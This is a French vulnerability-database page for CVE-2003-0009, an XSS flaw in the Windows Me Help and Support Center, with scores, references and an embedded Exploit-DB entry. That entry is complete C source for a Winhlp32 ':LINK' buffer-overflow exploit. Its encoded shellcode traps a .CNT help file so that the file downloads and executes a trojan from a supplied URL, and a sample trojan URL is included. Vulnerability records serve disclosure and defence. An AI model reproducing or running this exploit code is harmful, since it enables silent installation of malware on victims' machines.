CVE-2003-0009 : Détail

CVE-2003-0009

14.08%V4
Network
2004-09-01
02h00 +00:00
2008-02-06
23h00 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 22289

Date de publication : 2003-02-25 23h00 +00:00
Auteur : s0h
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/6966/info The Microsoft Windows ME Help and Support Center is prone to a buffer overflow. This is due to insufficient bounds checking on input supplied through the HCP URI parameter. An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system. A similar vulnerability was reported in the Windows XP Help and Support Center (BID 6802). These vulnerabilities may be related. ** Conflicting details have been reported about this vulnerability. The discoverer claims that the issue is cross site scripting that allows script code emebedded into the HCP URL to be executed. The discoverer also claims that Windows XP without SP1 is also vulnerable to this issue, while Microsoft claims that it is not. /************************************************* * s0h - Skin Of Humanity. * http://s0h.cc * * Title : Win32hlp exploit for : ":LINK overflow" * Date : Sunday, 9 March, 2003 1:00 AM * * ----------------------------------------------- * * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c * Binary : http://s0h.cc/exploit/s0h_Win32hlp.exe * * ----------------------------------------------- * Discovered by ThreaT <threat@s0h.cc>. * Coded by ThreaT <threat@s0h.cc> * Hompage : http://s0h.cc/~threat/ * * Winhlp32.exe exploit for ':LINK' overflow ! * * ----------------------------------------------- * * This exploit can trap a .CNT file (file with .- * HLP files) with the arbitrary code who can dow- * nload and execute a trojan without user ask. * * ----------------------------------------------- * * Compiling : cl /nologo s0h_Win32hlp.c * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] * Eq : C:\>s0h_Win32hlp.exe http://www.chez.com/mvm/trojan.exe c:\WINNT\Help\mplayer2.cnt 4 * * <trojan> = host to download the trojan (http:/- * /blah.plof/trojan.exe). * * <CNT file> = The CNT file. * * [offset] = Optionnal. This one defined a numbe- * r between 0 and 15 that can play with the retu- * rn address. Generaly, you must used 4 if the .- * HLP file is called by an application. * * ----------------------------------------------- * This exploit was tested on : * - Windows 2000 PRO/SERVER (fr) SP0 * - Windows 2000 PRO/SERVER (fr) SP1 * - Windows 2000 PRO/SERVER (fr) SP2 * ************************************************/ #include <windows.h> #define taille 270 #define VulnLen 650 int main (int argc, char *argv[]) { HANDLE ExploitFile; DWORD lpNumberOfBytesWritten, lpFileSizeHigh, FileSize; int i,j, len, RetByte=0xE5; char *file, *url; unsigned char *Shellcode, *buffer, RealGenericShellcode[] = "\x68\x5E\x56\xC3\x90\x8B\xCC\xFF\xD1\x83\xC6\x0E\x90\x8B\xFE\xAC" "\x34\x99\xAA\x84\xC0\x75\xF8" "\x72\xeb\xf3\xa9\xc2\xfd\x12\x9a\x12\xd9\x95\x12\xd1\x95\x12\x58\x12\xc5\xbd\x91" "\x12\xe9\xa9\x9a\xed\xbd\x9d\xa1\x87\xec\xd5\x12\xd9\x81\x12\xc1\xa5\x9a\x41\x12" "\xc2\xe1\x9a\x41\x12\xea\x85\x9a\x69\xcf\x12\xea\xbd\x9a\x69\xcf\x12\xca\xb9\x9a" "\x49\x12\xc2\x81\xd2\x12\xad\x03\x9a\x69\x9a\xed\xbd\x8d\x12\xaf\xa2\xed\xbd\x81" "\xed\x93\xd2\xba\x42\xec\x73\xc1\xc1\xaa\x59\x5a\xc6\xaa\x50\xff\x12\x95\xc6\xc6" "\x12\xa5\x16\x14\x9d\x9e\x5a\x12\x81\x12\x5a\xa2\x58\xec\x04\x5a\x72\xe5\xaa\x42" "\xf1\xe0\xdc\xe1\xd8\xf3\x93\xf3\xd2\xca\x71\xe2\x66\x66\x66\xaa\x50\xc8\xf1\xec" "\xeb\xf5\xf4\xff\x5e\xdd\xbd\x9d\xf6\xf7\x12\x75\xc8\xc8\xcc\x66\x49\xf1\xf0\xf5" "\xfc\xd8\xf3\x97\xf3\xeb\xf3\x9b\x71\xcc\x66\x66\x66\xaa\x42\xca\xf1\xf8\xb7\xfc" "\xe1\x5f\xdd\xbd\x9d\xfc\x12\x55\xca\xca\xc8\x66\xec\x81\xca\x66\x49\xaa\x42\xf1" "\xf0\xf7\xdc\xe1\xf3\x98\xf3\xd2\xca\x71\xb5\x66\x66\x66\x14\xd5\xbd\x89\xf3\x98" "\xc8\x66\x49\xaa\x42\xf1\xe1\xf0\xed\xc9\xf3\x98\xf3\xd2\xca\x71\x8b\x66\x66\x66" "\x66\x49\x71\xe6\x66\x66\x66"; printf (" * ***************************************************** *\n" " * s0h - Skin of humanity *\n" " * http://s0h.cc/ *\n" " * ***************************************************** *\n" " Win32hlp exploit for : \":LINK overflow\" *\n" " * ***************************************************** *\n" " * Discovered by ThreaT <threat@s0h.cc>. *\n" " * Coded by ThreaT <threat@s0h.cc> *\n" " * Hompage : http://s0h.cc/~threat/ *\n" " * Archive : http://s0h.cc/exploit/s0h_Win32hlp.c *\n" " * ***************************************************** *\n" ); if (argc < 3) { printf( " * ***************************************************** *\n" " * Usage : s0h_Win32hlp.exe <trojan> <CNT file> [offset] *\n" " * *\n" " * <trojan> = host to download the trojan (http:/- *\n" " * /blah.plof/trojan.exe). *\n" " * *\n" " * <CNT file> = The CNT file. *\n" " * *\n" " * [offset] = Optionnal. This one defined a number betw- *\n" " * een 0 and 15 that can play with the return address. - *\n" " * Generaly, you must used 4 if the .HLP file is called *\n" " * by an application. *\n" " * ***************************************************** *\n" ); ExitProcess (1); } if (argv[3]) RetByte = atoi (argv[3]) + 0xE0; len = taille + strlen (argv[1]) + 2 + 4; url = (char *) malloc (strlen (argv[1])); strcpy (url, argv[1]); /* * Create the final shellcode */ Shellcode = (unsigned char *) malloc (len); // encrypt the URL for (i=0;i<strlen (argv[1]); argv[1][i++]^=0x99); // inject the RealGenericShellcode in the shellcode buffer for (i=0;i<taille; Shellcode[i]=RealGenericShellcode[i++]); // append crypted URL to the shellcode buffer for (i,j=0;i<len - 1;Shellcode[i++]=argv[1][j++]); Shellcode[len-6]=0x99; // URL delimitation Shellcode[len-5]=0x2E; // fuck the winhlp32.exe parser // append the RET ADDR // Play with this bytes if the xploit don't work Shellcode[len-4]=0x30; Shellcode[len-3]=RetByte; Shellcode[len-2]=0x06; Shellcode[len-1]=0x00; /* Now, we make a vuln string for our exploit */ buffer = (unsigned char *) malloc (VulnLen); memset (buffer,0,VulnLen); lstrcpy (buffer,":Link "); for (i=6; i < VulnLen - len; buffer[i++] = (char)0x90); for (i,j=0; i < VulnLen; buffer[i++] = Shellcode[j++]); /* Trap the CNT file specified with the vuln string */ ExploitFile = CreateFile (argv[2],GENERIC_READ+GENERIC_WRITE, FILE_SHARE_READ+FILE_SHARE_WRITE,NULL, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if ( ExploitFile == INVALID_HANDLE_VALUE) { printf ("Error : cannot open cnt file '%s'\n",argv[2]); ExitProcess (1); } FileSize = GetFileSize(ExploitFile, &lpFileSizeHigh); FileSize += lpFileSizeHigh*MAXDWORD; file = (char *)LocalAlloc (LPTR, FileSize + 2); file[0] = 0x0d; file[1] = 0x0a; file += 2; ReadFile(ExploitFile,file,FileSize,&lpNumberOfBytesWritten,NULL); SetFilePointer (ExploitFile,0,NULL,FILE_BEGIN); WriteFile (ExploitFile,buffer,VulnLen,&lpNumberOfBytesWritten,NULL); file -= 2; WriteFile (ExploitFile,file,FileSize+2,&lpNumberOfBytesWritten,NULL); CloseHandle(ExploitFile); printf ( " * *******************************************************\n" " * The file is now traped and ready to download and exe- *\n" " * cute : *\n" " * File : %s\n" " * At : %s\n" " * *******************************************************\n" ,argv[2],url); if (RetByte != 0xE5) printf ( " * *******************************************************\n" " * You have specified this address : 0x0006%x30 *\n" " * The abitrary will loaded since an application. *\n" " * *******************************************************\n" ,RetByte); return 0; }

Products Mentioned

Configuraton 0

Microsoft>>Windows_me >> Version *

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version *

Références

http://www.ciac.org/ciac/bulletins/n-047.shtml
Tags : third-party-advisory, government-resource, x_refsource_CIAC
http://www.osvdb.org/6074
Tags : vdb-entry, x_refsource_OSVDB
http://marc.info/?l=bugtraq&m=104636383018686&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/489721
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/6966
Tags : vdb-entry, x_refsource_BID
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.